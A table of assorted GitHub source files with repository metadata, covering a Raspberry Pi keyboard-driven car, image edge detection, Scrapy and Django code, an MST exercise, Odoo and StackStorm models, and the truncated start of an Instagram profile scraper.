| seq_id | text | repo_name | sub_path | file_name | file_ext | file_size_in_byte | program_lang | lang | doc_type | stars | dataset | pt |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
70521198099 | #run code GPIOZERO_PIN_FACTORY=pigpio PIGPIO_ADDR=192.168.1.130 python3 test.py
# sudo pigpiod
from gpiozero import PWMLED
from time import sleep
from pynput import keyboard
forward = PWMLED(19)
reverse = PWMLED(13)
left = PWMLED(6)
right = PWMLED(5)
led = PWMLED(26)
speed = 1
steer = 1
def on_press(key):
try:
print('alphanumeric key {0} pressed'.format(
key.char))
except AttributeError:
print('special key {0} pressed'.format(
key))
    # pynput delivers one key per event, so format(key) can never equal two
    # different key names at once; the old combined-key branches were
    # unreachable. Throttle (cmd/alt) and steering (alt_r/cmd_r) are handled
    # independently, so holding a throttle key and a steering key combines them.
    if key == keyboard.Key.cmd:
        forward.value = speed
    elif key == keyboard.Key.alt:
        reverse.value = speed
    if key == keyboard.Key.alt_r:
        left.value = steer
    elif key == keyboard.Key.cmd_r:
        right.value = steer
    if key == keyboard.Key.shift:
        led.value = 1
def on_release(key):
print('{0} released'.format(
key))
forward.value = 0
reverse.value = 0
left.value = 0
right.value = 0
#led.value = 0
if key == keyboard.Key.esc:
# Stop listener
return False
# Collect events until released
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
| Herant/piDrv | as-built/Test_files/manual_control.py | manual_control.py | py | 1,781 | python | en | code | 3 | github-code | 13 |
41831003929 | import numpy as np
import matplotlib.colors as colors
def hsv_distance(color1, color2):
"""
Converts RGB colors to HSV and computes the distance between them in
cartesian coords.
Args:
color1: Unnormalized RGB color 1 (0-255)
color2: Unnormalized RGB color 2 (0-255)
Returns:
cartesian distance in HSV space
"""
color1_cart = hsv_to_cart(rgb_to_hsv(color1))
color2_cart = hsv_to_cart(rgb_to_hsv(color2))
return np.linalg.norm(color1_cart - color2_cart)
def rgb_to_hsv(rgb):
"""
RGB (0-255) to normalized (0-1) HSV
Args:
rgb: RGB val
Returns:
normalized HSV value
"""
# normalize
rgb = rgb / 255.0
return colors.rgb_to_hsv(rgb)
def hsv_to_cart(hsv):
"""
HSV to cartesian conversion
Based on code from
https://github.com/UQ-METR4202/metr4202_ximea_ros/blob/main/ximea_color/src/ximea_color_detect.cpp
Args:
hsv: normalized HSV color
    Returns:
        cartesian (x, y, z) coordinates as a numpy array
    """
    h = hsv[0] * 2.0 * np.pi  # hue from colors.rgb_to_hsv is normalized to [0, 1], not degrees
s = hsv[1]
v = hsv[2]
x = v * s * np.cos(h)
y = v * s * np.sin(h)
z = v
return np.array([x, y, z])
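
# Usage sketch (illustrative values, not from the original repo): distance
# between fully saturated red and green in HSV cartesian space.
if __name__ == "__main__":
    red = np.array([255, 0, 0])
    green = np.array([0, 255, 0])
    print(hsv_distance(red, green))  # ~1.73 for two fully saturated, distinct hues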
| imwendi/METR4202-Team-14 | src/vision/color_utils.py | color_utils.py | py | 1,157 | python | en | code | 2 | github-code | 13 |
26413470492 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import json
import sqlalchemy
import win32com.client as win32
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from coolscrapy.model import weekly, Base, engin, loadSession
class SomethingPipeline(object):
def __init__(self):
Base.metadata.create_all(engin)
app = 'Excel'
self.x1 = win32.gencache.EnsureDispatch('%s.Application' % app)
self.ss = self.x1.Workbooks.Add()
self.sh = self.ss.ActiveSheet
self.x1.Visible = True
self.session = loadSession()
self.i = 2
self.j = 5
def process_item(self,item,spider):
self.sh.Cells(self.j-1, 1).Value = "标题"
self.sh.Cells(self.j,1).Value = "URL连接"
self.sh.Cells(self.j + 1,1).Value = "内容简介"
        #content = json.dumps(dict(item), ensure_ascii=False) + "\n"  # serialize one item as a JSON line
        # the original mixed a truthiness test with an is-not-None test due to
        # operator precedence; check both fields explicitly instead
        if item['href'] is not None and item['content'] is not None:
self.sh.Cells(self.j-1, self.i).Value = item['title']
self.sh.Cells(self.j - 1, self.i).Font.Bold=True
self.sh.Cells(self.j, self.i).Value = item['href']
self.sh.Cells(self.j + 1, self.i).Value =item['content']
self.i = self.i + 1
bean=weekly.weekly(href=str(item['href']),content=str(item['content']),title=str(item['title']))
self.session.add(bean)
self.session.commit()
if self.i>10:
self.i=2
self.j+=3
return item
def open_spider(self,spider):
pass
def close_spider(self,spider):
self.ss.Close(True)
self.x1.Application.Quit()
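
# Sketch of how this pipeline would be enabled in settings.py (the dotted
# path follows from this module's location; the priority 300 is arbitrary):
# ITEM_PIPELINES = {
#     'coolscrapy.pipelines.SomethingPipeline': 300,
# }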
| Gaojunsu/coolscrapy | coolscrapy/pipelines.py | pipelines.py | py | 1,893 | python | en | code | 0 | github-code | 13 |
37657154014 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import cv2
import numpy as np
import scipy
from scipy.ndimage import convolve
from scipy import signal
# In[2]:
import matplotlib.pyplot as plt
# The notebook magic below only exists inside IPython/Jupyter; guard it so the
# exported script also runs in a plain interpreter.
try:
    get_ipython().run_line_magic('matplotlib', 'inline')
except NameError:
    pass
import matplotlib.image as mpig
# In[3]:
blade=mpig.imread("C:/Users/Asus/Desktop/emma-watson.jpg")
# In[121]:
plt.imshow(blade)
# In[5]:
blade
# In[123]:
blade.shape
# # Luminosity Gray
# In[136]:
gray = lambda rgb : np.dot(rgb[... , :3] , [0.21,0.72,0.07])
gray= gray(blade)
gray=gray/(np.max(gray)/255)
# In[137]:
plt.imshow(gray,cmap='gray')
# In[102]:
gray
# In[103]:
blade2=blade.copy()
# # Average Gray
# In[104]:
gray2=(blade[:,:,0].astype(float)+blade[:,:,1].astype(float)+blade[:,:,2].astype(float))/3  # cast to float to avoid uint8 overflow
# In[105]:
plt.imshow(gray2)
# In[106]:
red=blade2[:,:,0]
plt.imshow(red,cmap=plt.get_cmap('gray'), vmin=0, vmax=255)
# In[107]:
green=blade2[:,:,1]
plt.imshow(green)
# In[108]:
blue=blade2[:,:,2]
plt.imshow(blue)
# In[109]:
(h,w,d)=blade.shape
# # Blurring
#
# In[8]:
Medianblur=np.asarray([[1,1,1],[1,1,1],[1,1,1]])/9
# In[9]:
conv=signal.convolve2d(gray,Medianblur,"same")
conv=conv/(np.max(conv)/255.0)# normalising
# In[10]:
plt.imshow(conv,cmap='gray')
# # Sobel Operator
# In[11]:
sobelv=np.asarray([[-1,0,1],[-2,0,2],[-1,0,1]])
sobelh=sobelv.T
# In[12]:
edgeh=signal.convolve2d(conv,sobelh,"same")
# In[13]:
edgeh=edgeh/(np.max(edgeh)/255)
# # Horizontal edges
# In[14]:
plt.imshow(edgeh,cmap=plt.get_cmap('gray'))
# # Vertical Edges
# In[15]:
edgev=signal.convolve2d(conv,sobelv,"same")
edgev=edgev/(np.max(edgev)/255)
# In[16]:
plt.imshow(edgev,cmap='gray')
# In[20]:
type(edgev)
# In[21]:
edgev.shape
# In[17]:
edge=(edgeh**2+edgev**2)
# In[28]:
final=pow(edge,0.5)
# In[29]:
final=final/(np.max(final)/255)
# In[24]:
edgeh2=edgeh.astype(np.uint8)
# In[25]:
edgev2=edgev.astype(np.uint8)
# In[26]:
edge2=np.bitwise_or(edgeh2,edgev2)
# In[30]:
plt.imshow(final,cmap='gray')
# In[ ]:
# # Non max suppression
# In[33]:
def non_max_suppression(img, D):
M, N = img.shape
Z = np.zeros((M,N), dtype=np.int32)
angle = D * 180. / np.pi
angle[angle < 0] += 180
for i in range(1,M-1):
for j in range(1,N-1):
try:
q = 255
r = 255
#angle 0
if (0 <= angle[i,j] < 22.5) or (157.5 <= angle[i,j] <= 180):
q = img[i, j+1]
r = img[i, j-1]
#angle 45
elif (22.5 <= angle[i,j] < 67.5):
q = img[i+1, j-1]
r = img[i-1, j+1]
#angle 90
elif (67.5 <= angle[i,j] < 112.5):
q = img[i+1, j]
r = img[i-1, j]
#angle 135
elif (112.5 <= angle[i,j] < 157.5):
q = img[i-1, j-1]
r = img[i+1, j+1]
if (img[i,j] >= q) and (img[i,j] >= r):
Z[i,j] = img[i,j]
else:
Z[i,j] = 0
except IndexError as e:
pass
return Z
# In[34]:
m,n=edge.shape
# In[35]:
d = np.zeros((m,n), dtype=np.float32)
# In[36]:
import math
# In[85]:
for i in range(0,m):
for j in range(0,n):
if(edgeh[i,j]!=0):
d[i,j]=math.atan(edgev[i,j]/edgeh[i,j])
else:
d[i,j]=1.5708
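
# Vectorized alternative to the loop above (a sketch): np.arctan2 also covers
# the edgeh == 0 case, and its wider (-pi, pi] range is folded back into
# [0, 180) by the "angle[angle < 0] += 180" step inside non_max_suppression.
# d = np.arctan2(edgev, edgeh)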
# In[114]:
z=non_max_suppression(final,d)
# In[115]:
z=z/(np.max(z)/255)
# In[116]:
type(z)
# # Resultant Image
# In[117]:
plt.imshow(z,cmap='gray')
# # Applying thresholding to get more details and binarize
# In[138]:
for x in range(0, z.shape[0]):
for y in range(0, z.shape[1]):
if(z[x][y]>20):
z[x][y]=255
else:
z[x][y]=0.0
# In[139]:
plt.imshow(z,cmap='gray')
# In[ ]:
| Enish258/MLand-DL | Canny edge detection without opencv.py | Canny edge detection without opencv.py | py | 3,997 | python | en | code | 1 | github-code | 13 |
def homework_6(nodes):  # remember to rename this file to your student ID (e.g. 1104813.py)
    # Use Prim's / Kruskal's algorithm
    l = len(nodes)
    lst = []
    for i in range(l-1):  # compute the Manhattan distance between every pair of points
        for j in range(i+1, l):
            path = abs(nodes[i][0]-nodes[j][0])+abs(nodes[i][1]-nodes[j][1])  # abs: absolute value
            lst.append([i, j, path])
    lst = sorted(lst, key=lambda x: x[2])  # sort edges by distance, ascending
    tree = dict()  # union-find parent table: records which node each node is joined to
    for i in range(l):
        tree[i] = i
    def find_node(x):
        if tree[x] != x:
            tree[x] = find_node(tree[x])
        return tree[x]
    total = 0  # Kruskal: pick the shortest edges that join new components and add them up
    l = l-1
    for e in lst:
        n1, n2, _ = e
        if find_node(n1) != find_node(n2):
            tree[find_node(n2)] = find_node(n1)
            total += _
            l -= 1
            if l == 0:
                break
    return total
if __name__ == '__main__':
nodes = [[0,0],[2,6],[3,9],[6,4],[7,1]]
print(homework_6(nodes))
# 22
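# Complexity note: sorting the O(n^2) candidate edges dominates, so the
# overall running time is O(n^2 log n) for n input points.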
| daniel880423/Member_System | file/hw6/1100317/hw6_s1100317_0.py | hw6_s1100317_0.py | py | 1,123 | python | en | code | 0 | github-code | 13 |
31201073418 | import bson
import datetime
import mongoengine as me
import six
from st2common.util import mongoescape
from st2common.models.system.common import ResourceReference
__all__ = [
'StormFoundationDB',
'StormBaseDB',
'EscapedDictField',
'TagsMixin',
'TagField',
'ContentPackResourceMixin'
]
JSON_UNFRIENDLY_TYPES = (datetime.datetime, bson.ObjectId)
class StormFoundationDB(me.Document):
"""
Base abstraction for a model entity. This foundation class should only be directly
inherited from the application domain models.
"""
# ObjectIdField should be not have any constraints like required,
# unique etc for it to be auto-generated.
# TODO: Work out how we can mark this as a unique primary key.
id = me.ObjectIdField()
# see http://docs.mongoengine.org/guide/defining-documents.html#abstract-classes
meta = {
'abstract': True
}
def __str__(self):
attrs = list()
for k in sorted(self._fields.keys()):
v = getattr(self, k)
v = '"%s"' % str(v) if type(v) in [str, unicode, datetime.datetime] else str(v)
attrs.append('%s=%s' % (k, v))
return '%s(%s)' % (self.__class__.__name__, ', '.join(attrs))
def to_serializable_dict(self):
serializable_dict = {}
for k in sorted(six.iterkeys(self._fields)):
v = getattr(self, k)
v = str(v) if isinstance(v, JSON_UNFRIENDLY_TYPES) else v
serializable_dict[k] = v
return serializable_dict
class StormBaseDB(StormFoundationDB):
"""Abstraction for a user content model."""
name = me.StringField(required=True, unique=True)
description = me.StringField()
# see http://docs.mongoengine.org/guide/defining-documents.html#abstract-classes
meta = {
'abstract': True
}
class EscapedDictField(me.DictField):
def to_mongo(self, value):
value = mongoescape.escape_chars(value)
return super(EscapedDictField, self).to_mongo(value)
def to_python(self, value):
value = super(EscapedDictField, self).to_python(value)
return mongoescape.unescape_chars(value)
def validate(self, value):
if not isinstance(value, dict):
self.error('Only dictionaries may be used in a DictField')
if me.fields.key_not_string(value):
self.error("Invalid dictionary key - documents must have only string keys")
me.base.ComplexBaseField.validate(self, value)
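
# Minimal usage sketch (the document class below is hypothetical, not part of st2):
# class ExampleDB(StormFoundationDB):
#     data = EscapedDictField(required=False)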
class EscapedDynamicField(me.DynamicField):
def to_mongo(self, value):
value = mongoescape.escape_chars(value)
return super(EscapedDynamicField, self).to_mongo(value)
def to_python(self, value):
value = super(EscapedDynamicField, self).to_python(value)
return mongoescape.unescape_chars(value)
class TagField(me.EmbeddedDocument):
"""
To be attached to a db model object for the purpose of providing supplemental
information.
"""
name = me.StringField(max_length=1024)
value = me.StringField(max_length=1024)
class TagsMixin(object):
"""
Mixin to include tags on an object.
"""
tags = me.ListField(field=me.EmbeddedDocumentField(TagField))
@classmethod
def get_indices(cls):
return ['tags.name', 'tags.value']
class ContentPackResourceMixin(object):
"""
Mixin class which provides utility methods for models which contain
a "pack" attribute.
"""
def get_reference(self):
"""
        Retrieve the reference object for this model.
:rtype: :class:`ResourceReference`
"""
ref = ResourceReference(pack=self.pack,
name=self.name)
return ref
| gtmanfred/st2 | st2common/st2common/models/db/stormbase.py | stormbase.py | py | 3,727 | python | en | code | null | github-code | 13 |
10053191967 | # -*- encoding: utf-8 -*-
import re
from datetime import date, datetime
from decimal import Decimal
from django import template
from django.conf import settings
from django.template import defaultfilters
from django.utils.encoding import force_text
from django.utils.formats import number_format
from django.utils.safestring import mark_safe
from django.utils.timezone import is_aware, utc
from django.utils.translation import pgettext, ugettext as _, ungettext
register = template.Library()
# A tuple mapping each power-of-ten threshold to its converter,
# e.g. 1,809,379,782.37 -> "18.09 亿".
#
intword_converters = (
(12, lambda number: (
ungettext('%(value).2f 万亿', '%(value).2f 万亿', number),
ungettext('%(value)s 万亿', '%(value)s 万亿', number),
)),
(8, lambda number: (
ungettext('%(value).2f 亿', '%(value).2f 亿', number),
ungettext('%(value)s 亿', '%(value)s 亿', number),
)),
(7, lambda number: (
ungettext('%(value).2f 千万', '%(value).2f 千万', number),
ungettext('%(value)s 千万', '%(value)s 千万', number),
)),
(6, lambda number: (
ungettext('%(value).2f 百万', '%(value).2f 百万', number),
ungettext('%(value)s 百万', '%(value)s 百万', number),
)),
(4, lambda number: (
ungettext('%(value).2f 万', '%(value).2f 万', number),
ungettext('%(value)s 万', '%(value)s 万', number),
)),
)
@register.filter(is_safe=False)
def money_display(value):
"""
    Converts a large number to a friendly text representation using Chinese
    units. Works for numbers of 10,000 and above: for example, 1200000
    becomes '1.20 百万' and 1200000000 becomes '12.00 亿'.
"""
original_value = value
if value:
abs_value = abs(value)
value = Decimal(value)
if abs_value < 10000:
if '.' in str(value) and len(str(value).split('.')[-1]) > 3:
value = value.quantize(Decimal('0.01'))
return value
try:
value = int(value)
except (TypeError, ValueError):
return value
if abs(value) < 10000:
return original_value
def _check_for_i18n(value, float_formatted, string_formatted):
"""
Use the i18n enabled defaultfilters.floatformat if possible
"""
if settings.USE_L10N:
value = defaultfilters.floatformat(value, 2)
template = string_formatted
else:
template = float_formatted
return template % {'value': value}
for exponent, converters in intword_converters:
large_number = 10 ** exponent
if abs(value) > large_number:
new_value = value / float(large_number)
return _check_for_i18n(new_value, *converters(new_value))
return value
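
# Template usage sketch (assumes this tag library is loaded, e.g. {% load money %}):
# {{ 1200000000|money_display }}  ->  "12.00 亿"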
| fruitschen/fruits_learning | stocks/templatetags/money.py | money.py | py | 2,823 | python | en | code | 1 | github-code | 13 |
19628992003 | from django.shortcuts import render
from django.http import HttpResponse
from datetime import datetime
from django.template import Template, Context, loader
from appvet.models import *
from appvet.forms import *
# Create your views here.
# home page view
def vista_inicio(request):
return render(request, "appvet/inicio.html")
# CLIENTS --------------------------------------------------------------------------
def vista_clientes(request):
clientes = Cliente.objects.all()
return render(request, "appvet/clientes.html", {"cliente":clientes})
def vista_crear_cliente(request):
if request.method == "POST":
formulario = ClienteFormulario(request.POST)
        # validate the form
        if formulario.is_valid():
            # retrieve the data from the cleaned_data attribute
data = formulario.cleaned_data
cliente = Cliente(nombre = data["nombre"], telefono = data["telefono"])
cliente.save()
formulario = ClienteFormulario()
contexto = {"formulario": formulario}
return render(request, "appvet/crear_cliente.html", contexto)
# PETS -----------------------------------------------------------------------------
def vista_mascotas(request):
mascotas = Mascota.objects.all()
return render(request, "appvet/mascotas.html", {"mascota":mascotas})
def vista_crear_mascota(request):
if request.method == "POST":
formulario = MascotaFormulario(request.POST)
        # validate the form
        if formulario.is_valid():
            # retrieve the data from the cleaned_data attribute
data = formulario.cleaned_data
mascota = Mascota(nombre = data["nombre"], especie = data["especie"], raza = data["raza"], edad = data["edad"])
mascota.save()
formulario = MascotaFormulario()
contexto = {"formulario": formulario}
return render(request, "appvet/crear_mascota.html",contexto)
# PRODUCTS -------------------------------------------------------------------------
def vista_productos(request):
productos = Producto.objects.all()
return render(request, "appvet/productos.html", {"producto":productos})
def vista_crear_producto(request):
if request.method == "POST":
formulario = ProductoFormulario(request.POST)
        # validate the form
        if formulario.is_valid():
            # retrieve the data from the cleaned_data attribute
data = formulario.cleaned_data
producto = Producto(tipo = data["tipo"], marca = data["marca"], precio = data["precio"])
producto.save()
formulario = ProductoFormulario()
contexto = {"formulario": formulario}
return render(request, "appvet/crear_producto.html", contexto)
# SEARCH ---------------------------------------------------------------------------
def vista_buscador(request):
    if "tipo" in request.GET:  # avoid a KeyError when the parameter is absent
        tipo = Producto.objects.filter(tipo__icontains=request.GET["tipo"])
        return render(request, "appvet/buscador.html", {"tipo": tipo})
    return render(request, "appvet/buscador.html", {"tipo": []}) | ClEsteban/Entrega1Esteban | Entrega1Esteban/appvet/views.py | views.py | py | 3,152 | python | es | code | 0 | github-code | 13 |
42138462777 | import numpy as np
class Checkerboard:
def __init__(self):
self.state = np.zeros((3, 3), dtype=int)
self.is_live = True
def update(self, coordinates, player):
(i, j) = coordinates
self.state[i - 1, j - 1] = player
# check if game now over
diagonal_1 = self.state[0, 0] * self.state[1, 1] * self.state[2, 2]
diagonal_2 = self.state[2, 0] * self.state[1, 1] * self.state[0, 2]
        rows = self.state.prod(axis=1)  # per-row products (axis names were swapped)
        cols = self.state.prod(axis=0)  # per-column products
        diags = [diagonal_1, diagonal_2]
        lines = [*rows, *cols, *diags]
        # a straight line of o's <=> state 1, 1, 1 <=> product = 1
        # a straight line of x's <=> state 2, 2, 2 <=> product = 8
        # full board <=> product != 0
if 1 in lines or 8 in lines or self.state.prod() != 0:
self.is_live = False
def print(self):
np_state = self.state
str_lkup = {0: ' ',
1: 'o',
2: 'x'}
str_state = [[str_lkup[np_state[i, j]] for j in range(len(np_state[i]))] for i in range(len(np_state))]
if self.is_live:
print('This game is live')
else:
print('This game is over')
for i in range(len(str_state)):
print(*str_state[i], sep='|')
if i < 2:
print('-+-+-')
else:
print()
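
# Quick usage sketch (moves are illustrative; player 1 plays 'o', player 2 'x'):
if __name__ == "__main__":
    board = Checkerboard()
    board.update((1, 1), 1)
    board.update((2, 2), 2)
    board.print()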
| DanielBraddock/toe-tac-tic | checkerboards.py | checkerboards.py | py | 1,281 | python | en | code | 0 | github-code | 13 |
31492559127 | from django.contrib.auth import authenticate, login, logout, get_user_model
from django.db import IntegrityError
from rest_framework import status, viewsets, permissions
from rest_framework.views import APIView
from rest_framework.decorators import action
from rest_framework.response import Response
from user.serializers import UserSerializer, UserLoginSerializer, UserCreateSerializer, ParticipantSerializer, InstructorSerializer
from user.models import ParticipantProfile, InstructorProfile
User = get_user_model()
class UserSignUpView(APIView):
permission_classes = (permissions.AllowAny, )
# POST /api/v1/signup/
# Request Body : username, password, email, role, (university, accepted), (company, year)
def post(self, request, *args, **kwargs):
role = request.data.get('role')
if role != "participant" and role != "instructor":
return Response(status=status.HTTP_400_BAD_REQUEST, data='올바르지 않은 역할입니다.')
serializer = UserCreateSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
try:
user, jwt_token = serializer.save()
except IntegrityError:
return Response(status=status.HTTP_409_CONFLICT, data='이미 존재하는 유저 이메일입니다.')
if role == "participant":
true = ['t', 'T', 'y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE', 'on', 'On', 'ON', '1', 1, True]
false = ['f', 'F', 'n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE', 'off', 'Off', 'OFF', '0', 0, 0.0, False]
university = request.data.get('university', '')
accepted = request.data.get('accepted', True)
if accepted in true:
accepted = True
if accepted in false:
accepted = False
user.participant = ParticipantProfile.objects.create(university=university, accepted=accepted)
user.save()
if role == "instructor":
company = request.data.get('company', '')
year = request.data.get('year')
            if year and not (year.isdigit() and int(year) > 0):
                return Response(status=status.HTTP_400_BAD_REQUEST, data='올바르지 않은 연도 형식입니다.')
            # guard against year being None: int(None) would raise TypeError
            user.instructor = InstructorProfile.objects.create(company=company, year=int(year) if year else None)
user.save()
return Response({'user': user.email, 'token': jwt_token}, status=status.HTTP_201_CREATED)
class UserLoginView(APIView):
permission_classes = (permissions.AllowAny, )
# POST /api/v1/login/
def post(self, request):
serializer = UserLoginSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
token = serializer.validated_data['token']
return Response({'success': True, 'token': token}, status=status.HTTP_200_OK)
class UserViewSet(viewsets.GenericViewSet):
permission_classes = (permissions.IsAuthenticated, )
serializer_class = UserSerializer
queryset = User.objects.all()
    # PUT /api/v1/user/me/ : update
# Request Body : (university), (company, year)
def update(self, request, pk=None):
if pk != 'me':
return Response(status=status.HTTP_403_FORBIDDEN, data='다른 유저 정보를 수정할 수 없습니다.')
if request.user.is_anonymous:
return Response(status=status.HTTP_403_FORBIDDEN, data='먼저 로그인 하세요.')
user = request.user
data = request.data.copy()
data.pop('accepted', None)
serializer = self.get_serializer(user, data=data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.update(user, serializer.validated_data)
if user.participant:
serializer = ParticipantSerializer(user.participant, data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
if user.instructor:
            year = data.get('year')
            if year and not (year.isdigit() and int(year) > 0):
                return Response(status=status.HTTP_400_BAD_REQUEST, data='올바르지 않은 연도 형식입니다.')
            if year:  # only coerce when a year was actually supplied
                data['year'] = int(year)
serializer = InstructorSerializer(user.instructor, data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(status=status.HTTP_200_OK)
    # GET /api/v1/user/{user_id}/ : retrieve
def retrieve(self, request, pk=None):
if request.user.is_anonymous:
return Response(status=status.HTTP_403_FORBIDDEN, data='먼저 로그인 하세요.')
user = request.user if pk == 'me' else self.get_object()
return Response(self.get_serializer(user).data)
    # POST /api/v1/user/participant/ : register as a participant
# Request Body : university, accepted
@action(detail=False, methods=['POST'])
def participant(self, request):
if request.user.is_anonymous:
return Response(status=status.HTTP_403_FORBIDDEN, data='먼저 로그인 하세요.')
user = request.user
if user.participant:
return Response(status=status.HTTP_400_BAD_REQUEST, data='이미 참여자로 지정되었습니다.')
true = ['t', 'T', 'y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE', 'on', 'On', 'ON', '1', 1, True]
false = ['f', 'F', 'n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE', 'off', 'Off', 'OFF', '0', 0, 0.0, False]
university = request.data.get('university', '')
accepted = request.data.get('accepted', True)
if accepted in true:
accepted = True
if accepted in false:
accepted = False
user.participant = ParticipantProfile.objects.create(university=university, accepted=accepted)
user.save()
return Response(self.get_serializer(user).data, status=status.HTTP_201_CREATED)
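
    # Note: the truthy/falsy string lists above are duplicated in UserSignUpView;
    # a shared helper could replace both (a sketch, not part of the original module):
    # def parse_bool(value, default=True):
    #     if value in true: return True
    #     if value in false: return False
    #     return default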
| xxnpark/snucse | Waffle Studio/Django/Seminar 2/waffle_backend/user/views.py | views.py | py | 5,942 | python | en | code | 0 | github-code | 13 |
12805885013 | day_of_week = input("Enter a day:").lower()
if day_of_week == "monday":
print("Monday")
elif day_of_week == "tuesday":
print("Tuesday")
else:
print("Not Monday")
friends = ["Ross", "Taylor", "Joe"]
#if "Joe" in friends:
if "Joe" in {"Kabir","Aziz","Asma"}:
print("Joe is present")
else:
print("Absent")
search = input("What do you wanna search?")
while search in friends:
print("Present")
search = input("Do you wanna check someone else")
#for friend in friends:
for friend in range(4):
print(f"{friend} is my friend") | hyderdanyal/udemyPython | python basics/loops.py | loops.py | py | 554 | python | en | code | 0 | github-code | 13 |
def gcd(a, b):
    # Euclidean algorithm via repeated remainders
    while a > 0:
        if a < b:
            a, b = b, a
        a = a % b
    return b
for i in range(int(input())):
s = input()
r = s[::-1]
if gcd(int(s), int(r)) == 1: print("YES")
else: print("NO") | CuongNguyen291201/py | sodaonguyentocungnhau.py | sodaonguyentocungnhau.py | py | 223 | python | en | code | 0 | github-code | 13 |
14680820288 | import numpy as np
from lmfit.lineshapes import gaussian
from lmfit.models import Model
class Stepper:
def __init__(self, start, stop, npts):
self.start = start
self.stop = stop
self.npts = npts
def get_x(self):
return np.linspace(self.start, self.stop, self.npts)
def gaussian_mod(obj, amplitude, center, sigma):
return gaussian(obj.get_x(), amplitude, center, sigma)
def test_custom_independentvar():
"""Tests using a non-trivial object as an independent variable."""
npts = 501
xmin = 1
xmax = 21
cen = 8
obj = Stepper(xmin, xmax, npts)
y = gaussian(obj.get_x(), amplitude=3.0, center=cen, sigma=2.5)
y += np.random.normal(scale=0.2, size=npts)
gmod = Model(gaussian_mod)
params = gmod.make_params(amplitude=2, center=5, sigma=8)
out = gmod.fit(y, params, obj=obj)
assert out.nvarys == 3
assert out.nfev > 10
assert out.chisqr > 1
assert out.chisqr < 100
assert out.params['sigma'].value < 3
assert out.params['sigma'].value > 2
assert out.params['center'].value > xmin
assert out.params['center'].value < xmax
assert out.params['amplitude'].value > 1
assert out.params['amplitude'].value < 5
| lmfit/lmfit-py | tests/test_custom_independentvar.py | test_custom_independentvar.py | py | 1,235 | python | en | code | 948 | github-code | 13 |
4474465522 | # -*- coding: utf-8 -*-
from odoo import fields, models, api, _
class AccountCashboxLine(models.Model):
""" We add dynamic currency """
_inherit = 'account.cashbox.line'
# def _get_default_currency(self):
# currency_id = self.cashbox_id.currency_id
# if self.payment_method_id:
# currency_id = self.payment_method_id.cash_journal_id.currency_id \
# or self.payment_method_id.cash_journal_id.company_id.currency_id
# return currency_id
payment_method_id = fields.Many2one("pos.payment.method", _("Payment method"),
domain="[('is_cash_count', '=', True)]")
currency_id = fields.Many2one("res.currency", compute='_compute_currency_id', store=True)
cashbox_currency_id = fields.Many2one('res.currency', related='cashbox_id.currency_id')
converted_amount = fields.Monetary(compute='_compute_converted_amount', string='Amount currency', digits=0,
readonly=True, currency_field='cashbox_currency_id')
@api.model
def create(self, vals):
""" Computed currency """
cashbox_line_ids = super().create(vals)
cashbox_line_ids.compute_currency()
return cashbox_line_ids
def compute_currency(self):
""" Compute the currency """
for cashbox_line in self:
if cashbox_line.payment_method_id:
currency_id = cashbox_line.payment_method_id.cash_journal_id.currency_id \
or cashbox_line.payment_method_id.cash_journal_id.company_id.currency_id
cashbox_line.currency_id = currency_id
else:
cashbox_line.currency_id = cashbox_line.cashbox_id.currency_id
def recompute_converted_amount(self):
""" Re Compute the converted currency """
self.compute_currency()
for cashbox_line in self:
cashbox_line.converted_amount = cashbox_line.currency_id.compute(cashbox_line.subtotal, cashbox_line.cashbox_id.currency_id) or 0.0
@api.onchange("payment_method_id")
def _onchange_payment_method_id(self):
self.compute_currency()
@api.depends("payment_method_id")
def _compute_currency_id(self):
self.compute_currency()
@api.depends("currency_id", 'subtotal')
def _compute_converted_amount(self):
self.recompute_converted_amount()
class AccountBankStmtCashWizard(models.Model):
"""
Account Bank Statement popup that allows entering cash details.
"""
_inherit = 'account.bank.statement.cashbox'
@api.depends('cashbox_lines_ids')
def _recompute_line_ids_currencies(self):
for cashbox in self:
cashbox.cashbox_lines_ids.compute_currency()
@api.depends('cashbox_lines_ids', 'cashbox_lines_ids.coin_value', 'cashbox_lines_ids.number')
def _compute_total(self):
for cashbox in self:
cashbox.cashbox_lines_ids.compute_currency()
current_currency_id = self.currency_id
cashbox.total = sum([line.currency_id.compute(from_amount=line.subtotal, to_currency=current_currency_id)
for line in cashbox.cashbox_lines_ids])
| LuisMalave2001/GarryTesting | pos_pr/models/account_bank_statement.py | account_bank_statement.py | py | 3,230 | python | en | code | 2 | github-code | 13 |
13176295330 | try:
# import argparse
import json
import requests
except ModuleNotFoundError:
print("Please download dependencies from requirement.txt")
except Exception as ex:
print(ex)
def clean_non_utf8_chars(input_data):
if isinstance(input_data, str):
# If the input is a string, clean it and return the cleaned string
cleaned_string = ""
for char in input_data:
if ord(char) < 128:
cleaned_string += char
else:
cleaned_string += ' '
return cleaned_string
elif isinstance(input_data, dict):
# If the input is a dictionary, recursively clean its values
cleaned_dict = {}
for key, value in input_data.items():
cleaned_value = clean_non_utf8_chars(value)
cleaned_dict[key] = cleaned_value
return cleaned_dict
elif isinstance(input_data, list):
# If the input is a list, recursively clean its elements
cleaned_list = []
for item in input_data:
cleaned_item = clean_non_utf8_chars(item)
cleaned_list.append(cleaned_item)
return cleaned_list
else:
# For other data types, return as is
return input_data
'''can scrape only public Instagram accounts'''
class Instagram:
@staticmethod
def build_param(username):
params = {
'username': username,
}
return params
@staticmethod
def build_headers(username):
return {
'authority': 'www.instagram.com',
'accept': '*/*',
'accept-language': 'en-US,en;q=0.9',
'referer': f'https://www.instagram.com/{username}/',
'sec-ch-prefers-color-scheme': 'dark',
